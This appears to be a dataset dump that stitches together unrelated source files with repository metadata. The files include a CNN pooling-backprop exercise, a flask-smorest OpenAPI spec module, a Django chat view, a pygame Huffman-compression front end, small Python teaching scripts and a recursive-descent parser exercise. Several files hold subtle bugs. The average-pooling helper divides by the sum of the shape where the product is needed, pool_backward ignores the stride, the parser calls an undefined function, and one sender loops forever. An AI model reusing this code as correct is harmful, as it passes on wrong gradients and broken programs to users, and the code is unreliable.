# <td>
# **db_mean**
# </td>
# <td>
# 7.83923256462
# </td>
# </tr>
#
# </table>
#
# ## 5.2 Pooling layer - backward pass
#
# Next, let's implement the backward pass for the pooling layer, starting with the MAX-POOL layer. Even though a pooling layer has no parameters for backprop to update, you still need to backpropagation the gradient through the pooling layer in order to compute gradients for layers that came before the pooling layer.
#
# ### 5.2.1 Max pooling - backward pass
#
# Before jumping into the backpropagation of the pooling layer, you are going to build a helper function called `create_mask_from_window()` which does the following:
#
# $$ X = \begin{bmatrix}
# 1 && 3 \\
# 4 && 2
# \end{bmatrix} \quad \rightarrow \quad M =\begin{bmatrix}
# 0 && 0 \\
# 1 && 0
# \end{bmatrix}\tag{4}$$
#
# As you can see, this function creates a "mask" matrix which keeps track of where the maximum of the matrix is. True (1) indicates the position of the maximum in X, the other entries are False (0). You'll see later that the backward pass for average pooling will be similar to this but using a different mask.
#
# **Exercise**: Implement `create_mask_from_window()`. This function will be helpful for pooling backward.
# Hints:
# - [np.max()]() may be helpful. It computes the maximum of an array.
# - If you have a matrix X and a scalar x: `A = (X == x)` will return a matrix A of the same size as X such that:
# ```
# A[i,j] = True if X[i,j] = x
# A[i,j] = False if X[i,j] != x
# ```
# - Here, you don't need to consider cases where there are several maxima in a matrix.
# In[39]:
def create_mask_from_window(x):
"""
Creates a mask from an input matrix x, to identify the max entry of x.
Arguments:
x -- Array of shape (f, f)
Returns:
mask -- Array of the same shape as window, contains a True at the position corresponding to the max entry of x.
"""
### START CODE HERE ### (≈1 line)
mask = (x == np.max(x))
### END CODE HERE ###
return mask
# In[40]:
np.random.seed(1)
x = np.random.randn(2,3)
mask = create_mask_from_window(x)
print('x = ', x)
print("mask = ", mask)
# **Expected Output:**
#
# <table>
# <tr>
# <td>
#
# **x =**
# </td>
#
# <td>
#
# [[ 1.62434536 -0.61175641 -0.52817175] <br>
# [-1.07296862 0.86540763 -2.3015387 ]]
#
# </td>
# </tr>
#
# <tr>
# <td>
# **mask =**
# </td>
# <td>
# [[ True False False] <br>
# [False False False]]
# </td>
# </tr>
#
#
# </table>
# Why do we keep track of the position of the max? It's because this is the input value that ultimately influenced the output, and therefore the cost. Backprop is computing gradients with respect to the cost, so anything that influences the ultimate cost should have a non-zero gradient. So, backprop will "propagate" the gradient back to this particular input value that had influenced the cost.
# ### 5.2.2 - Average pooling - backward pass
#
# In max pooling, for each input window, all the "influence" on the output came from a single input value--the max. In average pooling, every element of the input window has equal influence on the output. So to implement backprop, you will now implement a helper function that reflects this.
#
# For example if we did average pooling in the forward pass using a 2x2 filter, then the mask you'll use for the backward pass will look like:
# $$ dZ = 1 \quad \rightarrow \quad dZ =\begin{bmatrix}
# 1/4 && 1/4 \\
# 1/4 && 1/4
# \end{bmatrix}\tag{5}$$
#
# This implies that each position in the $dZ$ matrix contributes equally to output because in the forward pass, we took an average.
#
# **Exercise**: Implement the function below to equally distribute a value dz through a matrix of dimension shape. [Hint](https://docs.scipy.org/doc/numpy-1.13.0/reference/generated/numpy.ones.html)
# In[41]:
def distribute_value(dz, shape):
"""
Distributes the input value in the matrix of dimension shape
Arguments:
dz -- input scalar
shape -- the shape (n_H, n_W) of the output matrix for which we want to distribute the value of dz
Returns:
a -- Array of size (n_H, n_W) for which we distributed the value of dz
"""
### START CODE HERE ###
# Retrieve dimensions from shape (≈1 line)
(n_H, n_W) = shape
# Compute the value to distribute on the matrix (≈1 line)
average = dz / np.sum(shape)
# Create a matrix where every entry is the "average" value (≈1 line)
a = np.ones(shape) * average
### END CODE HERE ###
return a
# In[42]:
a = distribute_value(2, (2,2))
print('distributed value =', a)
# **Expected Output**:
#
# <table>
# <tr>
# <td>
# distributed_value =
# </td>
# <td>
# [[ 0.5 0.5]
# <br\>
# [ 0.5 0.5]]
# </td>
# </tr>
# </table>
# ### 5.2.3 Putting it together: Pooling backward
#
# You now have everything you need to compute backward propagation on a pooling layer.
#
# **Exercise**: Implement the `pool_backward` function in both modes (`"max"` and `"average"`). You will once again use 4 for-loops (iterating over training examples, height, width, and channels). You should use an `if/elif` statement to see if the mode is equal to `'max'` or `'average'`. If it is equal to 'average' you should use the `distribute_value()` function you implemented above to create a matrix of the same shape as `a_slice`. Otherwise, the mode is equal to '`max`', and you will create a mask with `create_mask_from_window()` and multiply it by the corresponding value of dZ.
# In[43]:
def pool_backward(dA, cache, mode = "max"):
"""
Implements the backward pass of the pooling layer
Arguments:
dA -- gradient of cost with respect to the output of the pooling layer, same shape as A
cache -- cache output from the forward pass of the pooling layer, contains the layer's input and hparameters
mode -- the pooling mode you would like to use, defined as a string ("max" or "average")
Returns:
dA_prev -- gradient of cost with respect to the input of the pooling layer, same shape as A_prev
"""
### START CODE HERE ###
# Retrieve information from cache (≈1 line)
(A_prev, hparameters) = cache
# Retrieve hyperparameters from "hparameters" (≈2 lines)
stride = hparameters['stride']
f = hparameters['f']
# Retrieve dimensions from A_prev's shape and dA's shape (≈2 lines)
m, n_H_prev, n_W_prev, n_C_prev = A_prev.shape
m, n_H, n_W, n_C = dA.shape
# Initialize dA_prev with zeros (≈1 line)
dA_prev = np.zeros(A_prev.shape)
for i in range(m): # loop over the training examples
# select training example from A_prev (≈1 line)
a_prev = A_prev[i]
for h in range(n_H): # loop on the vertical axis
for w in range(n_W): # loop on the horizontal axis
for c in range(n_C): # loop over the channels (depth)
# Find the corners of the current "slice" (≈4 lines)
vert_start = h
vert_end = vert_start + f
horiz_start = w
horiz_end = horiz_start + f
# Compute the backward propagation in both modes.
if mode == "max":
# Use the corners and "c" to define the current slice from a_prev (≈1 line)
a_prev_slice = a_prev[vert_start:vert_end, horiz_start:horiz_end, c]
# Create the mask from a_prev_slice (≈1 line)
mask = create_mask_from_window(a_prev_slice)
# Set dA_prev to be dA_prev + (the mask multiplied by the correct entry of dA) (≈1 line)
dA_prev[i, vert_start: vert_end, horiz_start: horiz_end, c] += np.multiply(mask, dA[i, h, w, c])
elif mode == "average":
# Get the value a from dA (≈1 line)
da = dA[i, h, w, c]
# Define the shape of the filter as fxf (≈1 line)
shape = (f,f)
# Distribute it to get the correct slice of dA_prev. i.e. Add the distributed value of da. (≈1 line)
dA_prev[i, vert_start: vert_end, horiz_start: horiz_end, c] += distribute_value(da, shape)
### END CODE ###
# Making sure your output shape is correct
assert(dA_prev.shape == A_prev.shape)
return dA_prev
# In[44]:
np.random.seed(1)
A_prev = np.random.randn(5, 5, 3, 2)
hparameters = {"stride" : 1, "f": 2}
A, cache = pool_forward(A_prev, hparameters)
dA = np.random.randn(5, 4, 2, 2)
dA_prev = pool_backward(dA, cache, mode = "max")
print("mode = max")
print('mean of dA = ', np.mean(dA))
print('dA_prev[1,1] = ', dA_prev[1,1])
print()
dA_prev = pool_backward(dA, cache, mode = "average")
print("mode = average")
print('mean of dA = ', np.mean(dA))
print('dA_prev[1,1] = ', dA_prev[1,1])
# **Expected Output**:
#
# mode = max:
# <table>
# <tr>
# <td>
#
# **mean of dA =**
# </td>
#
# <td>
#
# 0.145713902729
#
# </td>
# </tr>
#
# <tr>
# <td>
# **dA_prev[1,1] =**
# </td>
# <td>
# [[ 0. 0. ] <br>
# [ 5.05844394 -1.68282702] <br>
# [ 0. 0. ]]
# </td>
# </tr>
# </table>
#
# mode = average
# <table>
# <tr>
# <td>
#
# **mean of dA =**
# </td>
#
# <td>
#
# 0.145713902729
#
# </td>
# </tr>
#
# <tr>
# <td>
# **dA_prev[1,1] =**
# </td>
# <td>
# [[ 0.08485462 0.2787552 ] <br>
# [ 1.26461098 -0.25749373] <br>
# [ 1.17975636 -0.53624893]]
# </td>
# </tr>
# </table>
# ### Congratulations !
#
# Congratulation on completing this assignment. You now understand how convolutional neural networks work. You have implemented all the building blocks of a neural network. In the next assignment you will implement a ConvNet using TensorFlow.
| [
"noreply@github.com"
] | noreply@github.com |
6dbd0089562c4fe55ce0b2f50c7e256a49998243 | 8cb3e0565f9711e622d206d10c95b9e81b87375a | /scripts/states/state45Right.py | e283444bc80196511363052b6e02795e1e059049 | [] | no_license | Brent-Kuhn/Dat_Whip | f03819a48ddf94681fd9071ff736f50b7b5f75a3 | 4dc80a03bf392e72af2f316c052d60c222dafbf0 | refs/heads/master | 2021-09-25T02:19:52.745487 | 2018-10-17T01:45:55 | 2018-10-17T01:45:55 | 121,988,346 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 292 | py | #!/usr/bin/python
from states.state45 import State45
class State45Right(State45):
def error(self, lidar, zed, imu):
return -1 # Turn right, indiscriminately
# TODO don't hit the cone if possible
def nextState(self, lidar, zed, imu):
return 'StateCircleLeft'
| [
"car@car.car"
] | car@car.car |
1529d544e0bb3a4bd339573ef601dd8e4b554446 | 301c7ca9863a1fa8379a335fd6bf57cd074522d1 | /海贼/python/模块/1.py | b7b5c572c37d867997925491c4a5e0074c829360 | [] | no_license | qingdaopijiudiaoge/haizei | f8bbac869ff0f76076b8f167e562a2512db47f29 | 26d43ca910272aa3868d408e661376166dea8da4 | refs/heads/master | 2023-01-31T14:48:39.693647 | 2020-12-17T12:15:55 | 2020-12-17T12:15:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | py | #!/usr/bin/env python
# coding=utf-8
# os 模块
import os
#打开文件
path = '/home/yuzhendi/海贼/python'
dirs = os.listdir(path)
for file in dirs:
print(file)
#创建多级目录
path = './test/a'
os.makedirs(path)
#判断路径是否存在
| [
"1316215578@qq.com"
] | 1316215578@qq.com |
1a6f4d5281aa3da6826118ec92cb6ca72bf2022f | 71be8a99bd3d8b26204e5552b70078dfdb20d27b | /03.py | 929d0e6ff0c787f9eee20e1ab5b95aaeed014968 | [] | no_license | shady2022/tamrin_python1 | 5123a05eaf49a0b93b34bee004e01cce751d2c7c | f6e801722f9753325f09275f82850fde8fda2f04 | refs/heads/main | 2023-07-05T22:31:20.733332 | 2021-07-29T18:46:24 | 2021-07-29T18:46:24 | 390,820,101 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 398 | py | import math
name = input()
family = input()
a = float(input("please enter the number of first exam:"))
b = float(input("please enter the number of second exam:"))
c = float(input("please enter the number of third exam:"))
avarage = (a+b+c)/3
if avarage >= 17:
print("GREAT!!!")
if avarage >= 12 and avarage <17:
print("NORMAL")
if avarage < 12:
print("FAIL") | [
"noreply@github.com"
] | noreply@github.com |
e3d149b7b7cf48fd12d2013aefb000ecade6610f | 5d32d0e65aa3bfa677fd1b8c92569e07e9b82af1 | /Section 5 - Programming Logic/Guess game v3 - multiple if.py | 1136fb613ad7c5b24b6249a57be9343f93a90ebf | [
"CC0-1.0"
] | permissive | pdst-lccs/lccs-python | b74ef2a02ac8ad2637f713fff5559f4e56c9827d | 95cb7ece05716521e9951d7a40de8fb20a88021f | refs/heads/master | 2023-05-28T00:46:57.313972 | 2023-05-22T10:16:43 | 2023-05-22T10:16:43 | 240,501,524 | 21 | 18 | null | null | null | null | UTF-8 | Python | false | false | 687 | py | # Event: LCCS Python Fundamental Skills Workshop
# Date: May 2018
# Author: Joe English, PDST
# eMail: computerscience@pdst.ie
# Name: Guessing Game v3
# Purpose: A program to demonstrate the multiple if statement
import random
number = random.randint(1, 10)
# The next line can be commented out later ...
print(number) # have a sneak peek at the number to guess!
guess = int(input("Enter a number between 1 and 10: "))
# Evaluate the condition
if guess == number:
print("Correct")
print("Well done!")
elif guess < number:
print("Hard luck!")
print("Too low")
else:
print("Hard luck!")
print("Too high")
print("Goodbye")
| [
"noreply@github.com"
] | noreply@github.com |
c651cd4ab09477167951d857f41bf5dd83a8c76c | 1f03e91bb1f743ac39e973e36935778c21ccaea4 | /meetingapp/chatengine/views.py | 916c6e05c79da1c445a00cbe256e11487d703164 | [] | no_license | Golub-Sergey/django-meeting-site | 0747de0fd9669be21c2d6b86b4dd518a9f44bb5c | dd174fe794390936e6ab834d1cf3b08a0292dea6 | refs/heads/master | 2020-05-03T10:13:18.520731 | 2019-03-30T15:18:14 | 2019-03-30T15:18:14 | 178,574,237 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 882 | py | from django.shortcuts import render
import json
from django.utils.safestring import mark_safe
from django.views.generic import TemplateView
from meetingsite.models import CustomUser
from .models import Group
from django.contrib.auth.decorators import login_required
from django.utils.decorators import method_decorator
@method_decorator(login_required, 'dispatch')
class RoomView(TemplateView):
template_name = 'chatengine/room.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
receiver = kwargs['room_name']
query_receiver = CustomUser.objects.get(username=receiver)
group_messages = Group.objects.filter(group_name__icontains=receiver)
context = {
'receiver': query_receiver,
'group_messages': group_messages
}
return context
| [
"1.golub.sergey.1@gmail.com"
] | 1.golub.sergey.1@gmail.com |
4d5dc1e342aed21f55fcc37ab7d21a41f9ae9112 | 01f065407c770c380ff4fcc7f76dc8c2316aea49 | /压缩软件前端.py | 5d5b01c0c3388b7b574923c132b9ae4843dff587 | [] | no_license | JiaminL/Huffman | 07f3dc03c29ac5f4a865a48050fc21130ac03beb | ae8886574c7afecfeb41804ca46060eadac12eb6 | refs/heads/master | 2020-04-09T08:55:28.710122 | 2018-12-03T15:30:30 | 2018-12-03T15:30:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,415 | py | import os,pygame,sys
import subprocess as sp
from pygame.locals import*
# R G B
WHITE = (255,255,255)
BLUE = ( 0, 0,255)
YELLOW = (255,255, 0)
BLACK = ( 0, 0, 0)
GARY = (235,235,235)
FPS=30
WINDOWWIDTH=1200
WINDOWHEIGHT=700
PARTWIDTH=WINDOWWIDTH/3
TEXTSIZE1=50
TEXTSIZE2=25
TEXTSIZE3=35
GAPSIZE=5
BUTTOMWIDTH=100
BUTTOMHEIGHT=40
TEXTBEGIN=GAPSIZE*3+TEXTSIZE1
ORIFOLDER="huffman实验测试集"
ZIPFOLDER="huffman实验压缩文件"
UNZIPFOLDER="huffman实验解压文件"
PARTNAME=("原文件","压缩文件","解压文件")
EXENAME=("./压缩后端","./解压后端")
def sedInform(exeName,oriFile,midFile,huffFile):
p = sp.Popen(exeName, stdin=sp.PIPE, stdout=sp.PIPE)
while True:
try:
data = "{}\n{}\n{}\n".format(oriFile, midFile, huffFile).encode("ascii")
p.stdin.write(data)
p.stdin.flush()
except:
print("there is some errors when send the name of files to c programe")
def getFileName():
F=[]
for fileDir in (ORIFOLDER,ZIPFOLDER,UNZIPFOLDER):
for root,dirs,files in os.walk(fileDir):
dele=[]
if fileDir==ZIPFOLDER:
for path in files:
if os.path.splitext(path)[1]!=".huff":
dele.append(path)
elif fileDir==ORIFOLDER:
for path in files:
if os.path.splitext(path)[1]==".mid":
dele.append(path)
for path in dele:
files.remove(path)
F.append(files)
return F
def newFolder():
path=os.path.abspath("")
for folerName in (ORIFOLDER,ZIPFOLDER,UNZIPFOLDER):
try:
os.path.join(path,folerName)
os.mkdir(path+"\\"+folerName)
except:
continue
def drawText(Text,size,left,top,textcolor,boxcolor):
fontObj=pygame.font.Font('simkai.ttf',size)
textSurfaceObj=fontObj.render(Text,True,textcolor,boxcolor)
textRectObj=textSurfaceObj.get_rect()
textRectObj.topleft=(left,top)
DISPLAYSURF.blit(textSurfaceObj,textRectObj)
def drawWindow(files):
DISPLAYSURF.fill(WHITE)
for i in range(3):
x=i*PARTWIDTH
pygame.draw.line(DISPLAYSURF,BLUE,(x,0),(x,WINDOWHEIGHT),2)
x+=GAPSIZE
drawText(PARTNAME[i],TEXTSIZE1,x,GAPSIZE,BLACK,WHITE)
y=TEXTBEGIN
for fileName in files[i]:
drawText(fileName,TEXTSIZE2,x,y,BLACK,WHITE)
y+=TEXTSIZE2+GAPSIZE
def getBoxAtPixel(mousex,mousey):
boxx=int(mousex/PARTWIDTH)
boxy=int((mousey-TEXTBEGIN)/(TEXTSIZE2+GAPSIZE))
return (boxx,boxy)
def getChoice():
mousex=0
mousey=0
while True:
files=getFileName()
oriFile,zipFile,unzipFile=files
fileLength=(len(oriFile),len(zipFile),len(unzipFile))
mouseClicked=False
drawWindow(files)
for event in pygame.event.get():
if event.type==QUIT or (event.type==KEYUP and event.key==K_ESCAPE):
pygame.quit()
sys.exit()
elif event.type==MOUSEMOTION:
mousex,mousey=event.pos
elif event.type==MOUSEBUTTONUP:
mousex,mousey=event.pos
mouseClicked=True
myChoice=getBoxAtPixel(mousex,mousey)
if myChoice[0]<2 and myChoice[1]>=0 and myChoice[1]<fileLength[myChoice[0]]:
if myChoice[0]:text="解压"
else:text="压缩"
left,top=(myChoice[0]*PARTWIDTH,TEXTBEGIN+(TEXTSIZE2+GAPSIZE)*myChoice[1])
pygame.draw.rect(DISPLAYSURF,YELLOW,(left,top-GAPSIZE/2,PARTWIDTH,TEXTSIZE2+GAPSIZE),4)
drawText(text,TEXTSIZE2,(myChoice[0]+1)*PARTWIDTH-2*TEXTSIZE2,top,YELLOW,WHITE)
if mouseClicked:
return myChoice
pygame.display.update()
def run(path1,choise):
files=getFileName()
if choise[0]==0:
text="压缩“"+files[choise[0]][choise[1]]+"”中……请耐心等待"
oriname=path1+"\\"+ORIFOLDER+"\\"+files[choise[0]][choise[1]]
huffname=path1+"\\"+ZIPFOLDER+"\\"+files[choise[0]][choise[1]]+".huff"
else:
path=files[choise[0]][choise[1]]
text="解压“"+path+"”中……请耐心等待"
oriname=path1+"\\"+UNZIPFOLDER+"\\new"+os.path.splitext(path)[0]
huffname=path1+"\\"+ZIPFOLDER+"\\"+files[choise[0]][choise[1]]
try:
p = sp.Popen(EXENAME[choise[0]], stdin=sp.PIPE, stdout=sp.PIPE)
data = "{}\n{}\n".format(oriname, huffname).encode("gbk")
drawText(text,TEXTSIZE3,GAPSIZE,WINDOWHEIGHT-TEXTSIZE3-GAPSIZE,BLACK,GARY)
pygame.display.update()
p.stdin.write(data)
p.stdin.flush()
s=p.stdout.readline()
except:
print("error run")
print( "{}\n{}\n".format(oriname, huffname))
def main():
global DISPLAYSURF
path=os.path.abspath("")
newFolder()
pygame.init()
DISPLAYSURF=pygame.display.set_mode((WINDOWWIDTH,WINDOWHEIGHT))
pygame.display.set_caption('压缩软件')
while True:
files=getFileName()
drawWindow(files)
for event in pygame.event.get():
if event.type==QUIT:
pygame.quit()
sys.exit()
choise=getChoice()
run(path,choise)
pygame.display.update()
if __name__=='__main__':
main()
| [
"43880486+TheaLu@users.noreply.github.com"
] | 43880486+TheaLu@users.noreply.github.com |
f71ec4146bf3702e19f5c68b3fd31bc7127c802f | ebfcae1c5ba2997b2ac4471d5bedc3f5daffcb31 | /flask-smorest-master/flask_smorest/spec/__init__.py | f64833894a322e17deab1be0723b1895c67e7fb5 | [
"MIT"
] | permissive | babiato/flaskapp1 | 84de2d0b26a54f5820d3bbe97926782ad41e005c | 530beb9e3b8516e0e93960b99521c23a523ef546 | refs/heads/master | 2023-02-26T16:36:49.760632 | 2021-02-04T09:08:40 | 2021-02-04T09:08:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,624 | py | """API specification using OpenAPI"""
import json
import http
import flask
from flask import current_app
import click
import apispec
from apispec.ext.marshmallow import MarshmallowPlugin
from flask_smorest.exceptions import MissingAPIParameterError
from flask_smorest.utils import prepare_response
from .plugins import FlaskPlugin
from .field_converters import uploadfield2properties
def _add_leading_slash(string):
"""Add leading slash to a string if there is None"""
return string if string.startswith('/') else '/' + string
DEFAULT_REQUEST_BODY_CONTENT_TYPE = 'application/json'
DEFAULT_RESPONSE_CONTENT_TYPE = 'application/json'
class DocBlueprintMixin:
"""Extend Api to serve the spec in a dedicated blueprint."""
def _register_doc_blueprint(self):
"""Register a blueprint in the application to expose the spec
Doc Blueprint contains routes to
- json spec file
- spec UI (ReDoc, Swagger UI).
"""
api_url = self._app.config.get('OPENAPI_URL_PREFIX', None)
if api_url is not None:
blueprint = flask.Blueprint(
'api-docs',
__name__,
url_prefix=_add_leading_slash(api_url),
template_folder='./templates',
)
# Serve json spec at 'url_prefix/openapi.json' by default
json_path = self._app.config.get(
'OPENAPI_JSON_PATH', 'openapi.json')
blueprint.add_url_rule(
_add_leading_slash(json_path),
endpoint='openapi_json',
view_func=self._openapi_json)
self._register_redoc_rule(blueprint)
self._register_swagger_ui_rule(blueprint)
self._app.register_blueprint(blueprint)
def _register_redoc_rule(self, blueprint):
"""Register ReDoc rule
The ReDoc script URL should be specified as OPENAPI_REDOC_URL.
"""
redoc_path = self._app.config.get('OPENAPI_REDOC_PATH')
if redoc_path is not None:
redoc_url = self._app.config.get('OPENAPI_REDOC_URL')
if redoc_url is not None:
self._redoc_url = redoc_url
blueprint.add_url_rule(
_add_leading_slash(redoc_path),
endpoint='openapi_redoc',
view_func=self._openapi_redoc)
def _register_swagger_ui_rule(self, blueprint):
"""Register Swagger UI rule
The Swagger UI scripts base URL should be specified as
OPENAPI_SWAGGER_UI_URL.
"""
swagger_ui_path = self._app.config.get('OPENAPI_SWAGGER_UI_PATH')
if swagger_ui_path is not None:
swagger_ui_url = self._app.config.get('OPENAPI_SWAGGER_UI_URL')
if swagger_ui_url is not None:
self._swagger_ui_url = swagger_ui_url
blueprint.add_url_rule(
_add_leading_slash(swagger_ui_path),
endpoint='openapi_swagger_ui',
view_func=self._openapi_swagger_ui)
def _openapi_json(self):
"""Serve JSON spec file"""
# We don't use Flask.jsonify here as it would sort the keys
# alphabetically while we want to preserve the order.
return current_app.response_class(
json.dumps(self.spec.to_dict(), indent=2),
mimetype='application/json')
def _openapi_redoc(self):
"""Expose OpenAPI spec with ReDoc"""
return flask.render_template(
'redoc.html', title=self.spec.title, redoc_url=self._redoc_url)
def _openapi_swagger_ui(self):
"""Expose OpenAPI spec with Swagger UI"""
return flask.render_template(
'swagger_ui.html',
title=self.spec.title,
swagger_ui_url=self._swagger_ui_url,
swagger_ui_config=self._app.config.get(
'OPENAPI_SWAGGER_UI_CONFIG', {})
)
class APISpecMixin(DocBlueprintMixin):
"""Add APISpec related features to Api class"""
def _init_spec(
self, *,
flask_plugin=None, marshmallow_plugin=None, extra_plugins=None,
title=None, version=None, openapi_version=None,
**options
):
# Plugins
self.flask_plugin = flask_plugin or FlaskPlugin()
self.ma_plugin = marshmallow_plugin or MarshmallowPlugin()
plugins = [self.flask_plugin, self.ma_plugin]
plugins.extend(extra_plugins or ())
# APISpec options
title = self._app.config.get('API_TITLE', title)
if title is None:
raise MissingAPIParameterError(
'API title must be specified either as "API_TITLE" '
'app parameter or as "title" spec kwarg.'
)
version = self._app.config.get('API_VERSION', version)
if version is None:
raise MissingAPIParameterError(
'API version must be specified either as "API_VERSION" '
'app parameter or as "version" spec kwarg.'
)
openapi_version = self._app.config.get(
'OPENAPI_VERSION', openapi_version)
if openapi_version is None:
raise MissingAPIParameterError(
'OpenAPI version must be specified either as "OPENAPI_VERSION '
'app parameter or as "openapi_version" spec kwarg.'
)
openapi_major_version = int(openapi_version.split('.')[0])
if openapi_major_version < 3:
base_path = self._app.config.get('APPLICATION_ROOT')
options.setdefault('basePath', base_path)
options.setdefault(
'produces', [DEFAULT_RESPONSE_CONTENT_TYPE, ])
options.setdefault(
'consumes', [DEFAULT_REQUEST_BODY_CONTENT_TYPE, ])
options.update(self._app.config.get('API_SPEC_OPTIONS', {}))
# Instantiate spec
self.spec = apispec.APISpec(
title, version, openapi_version, plugins, **options,
)
# Register custom fields in spec
for args in self._fields:
self._register_field(*args)
# Register custom converters in spec
for args in self._converters:
self._register_converter(*args)
# Register Upload field properties function
self.ma_plugin.converter.add_attribute_function(uploadfield2properties)
# Register OpenAPI command group
self._app.cli.add_command(openapi_cli)
def register_converter(self, converter, func):
"""Register custom path parameter converter
:param BaseConverter converter: Converter
Subclass of werkzeug's BaseConverter
:param callable func: Function returning a parameter schema from
a converter intance
Example: ::
# Register MongoDB's ObjectId converter in Flask application
app.url_map.converters['objectid'] = ObjectIdConverter
# Define custom converter to schema function
def objectidconverter2paramschema(converter):
return {'type': 'string', 'format': 'ObjectID'}
# Register converter in Api
api.register_converter(
ObjectIdConverter,
objectidconverter2paramschema
)
@blp.route('/pets/{objectid:pet_id}')
...
api.register_blueprint(blp)
Once the converter is registered, all paths using it will have
corresponding path parameter documented with the right schema.
Should be called before registering paths with
:meth:`Blueprint.route <Blueprint.route>`.
"""
self._converters.append((converter, func))
# Register converter in spec if app is already initialized
if self.spec is not None:
self._register_converter(converter, func)
def _register_converter(self, converter, func):
self.flask_plugin.register_converter(converter, func)
def register_field(self, field, *args):
"""Register custom Marshmallow field
Registering the Field class allows the Schema parser to set the proper
type and format when documenting parameters from Schema fields.
:param Field field: Marshmallow Field class
``*args`` can be:
- a pair of the form ``(type, format)`` to map to
- a core marshmallow field type (then that type's mapping is used)
Examples: ::
# Map to ('string', 'ObjectId') passing type and format
api.register_field(ObjectId, 'string', 'ObjectId')
# Map to ('string', ) passing type
api.register_field(CustomString, 'string', None)
# Map to ('string, 'date-time') passing a marshmallow Field
api.register_field(CustomDateTime, ma.fields.DateTime)
Should be called before registering schemas with
:meth:`schema <Api.schema>`.
"""
self._fields.append((field, *args))
# Register field in spec if app is already initialized
if self.spec is not None:
self._register_field(field, *args)
def _register_field(self, field, *args):
self.ma_plugin.map_to_openapi_type(*args)(field)
def _register_responses(self):
"""Register default responses for all status codes"""
# Register a response for each status code
for status in http.HTTPStatus:
response = {
'description': status.phrase,
'schema': self.ERROR_SCHEMA,
}
prepare_response(
response, self.spec, DEFAULT_RESPONSE_CONTENT_TYPE)
self.spec.components.response(status.name, response)
# Also register a default error response
response = {
'description': 'Default error response',
'schema': self.ERROR_SCHEMA,
}
prepare_response(response, self.spec, DEFAULT_RESPONSE_CONTENT_TYPE)
self.spec.components.response('DEFAULT_ERROR', response)
openapi_cli = flask.cli.AppGroup('openapi', help='OpenAPI commands.')
@openapi_cli.command('print')
def print_openapi_doc():
"""Print OpenAPI document."""
api = current_app.extensions['flask-smorest']['ext_obj']
print(json.dumps(api.spec.to_dict(), indent=2))
@openapi_cli.command('write')
@click.argument('output_file', type=click.File(mode='w'))
def write_openapi_doc(output_file):
"""Write OpenAPI document to a file."""
api = current_app.extensions['flask-smorest']['ext_obj']
output_file.write(json.dumps(api.spec.to_dict(), indent=2))
| [
"jinxufang@tencent.com"
] | jinxufang@tencent.com |
096d626ce7a7af283743aee8c2538a17819466d5 | d9b05ce6e7de369905767cd20f52d7549b5f96d0 | /interpreter/dragon_book/ex_2_4_2.py | 65598f2afd9c23be3d5c84a9e9d782e6b95de5c2 | [] | no_license | constant-mihai/learnpython | 6847d08017ed963045f9bb5378e1c0890b8c66ff | 6e854ff96bba7979ba98ab631bd3267af5b9603d | refs/heads/master | 2020-03-23T00:14:21.700989 | 2018-08-05T09:59:45 | 2018-08-05T09:59:45 | 140,852,095 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,376 | py | #!/usr/bin/python3
lookahead = 0
#
# Match
#
def match(expression, char):
global lookahead
if expression[lookahead] == char:
lookahead+=1
else:
raise Exception("Error matching: " + char)
#
# Parse expression
#
def parse_expression(expression):
parse_expression_R(expression)
#
# Parse expression
#
def parse_expression_R(expression):
"""
Dragon book excercise 2.4.1
Second expression: S -> S (S) S | @
The production is left recursive. Need to transform it to
right recursive":
A -> Aa | b
-----------
A -> bR
R -> aR | @
Derived into:
S -> @R
R -> (S) S R
"""
global lookahead
if len(expression) <= lookahead:
print("Parsed everything.")
return
print ("Lookahead = {}".format(lookahead))
if expression[lookahead] == "(":
match(expression, "(")
parse_expression_2(expression)
match(expression, ")")
parse_expression_2(expression)
parse_expression_R(expression)
else:
print("Char: " + expression[lookahead])
#
# Main
#
def main():
print("Introduce an expresion of the type: ")
print("S -> S (S) S | @ ")
print("No spaces.")
expression = input("Input:")
lookahead = 0
parse_expression_2(expression)
#
# Module check
#
if __name__ == "__main__":
main()
| [
"constant.mihai@googlemail.com"
] | constant.mihai@googlemail.com |
8bed097e367631c63f10afc542fc6ca29a80a6b9 | 07a3ec7bddb516d942ba38a370ba80ae0c047483 | /start_worker.py | 3018669ab5cebecd06d08a4ae9c4eaf26dc69741 | [] | no_license | JackNeus/bookish-waddle | 8facf0d7745ae789887afa15e3011e1b25f6feea | 979e3bfeeaf9bdd0b936236062437a83dc322596 | refs/heads/master | 2020-03-28T17:53:30.247490 | 2019-05-03T20:13:37 | 2019-05-03T20:13:37 | 148,832,659 | 0 | 1 | null | 2019-05-03T19:35:39 | 2018-09-14T19:23:41 | Python | UTF-8 | Python | false | false | 914 | py | import os
os.environ["in_bookish"] = "true"
# Custom RQ worker.
from config import DevConfig, ProdConfig
from tasks.util import init_db_connection, set_config
from mongoengine import register_connection
from rq import Connection, Worker
import sys
config_class = DevConfig
if len(sys.argv) > 1:
mode = sys.argv[1]
if mode == "prod":
print("Running in production mode.")
config_class = ProdConfig
elif mode == "dev":
print("Running in development mode.")
config_class = DevConfig
else:
exit("Invalid argument.")
else:
print("Running in development mode (default).")
config = vars(config_class)
set_config(config)
init_db_connection()
from tasks.worker import BookishWorker
# Provide queue names to listen to as arguments to this script,
# similar to rq worker
with Connection():
qs = [config['REDIS_QUEUE_NAME']]
print("Starting BookishWorker...")
w = BookishWorker(qs)
w.work()
| [
"jack.neus@gmail.com"
] | jack.neus@gmail.com |
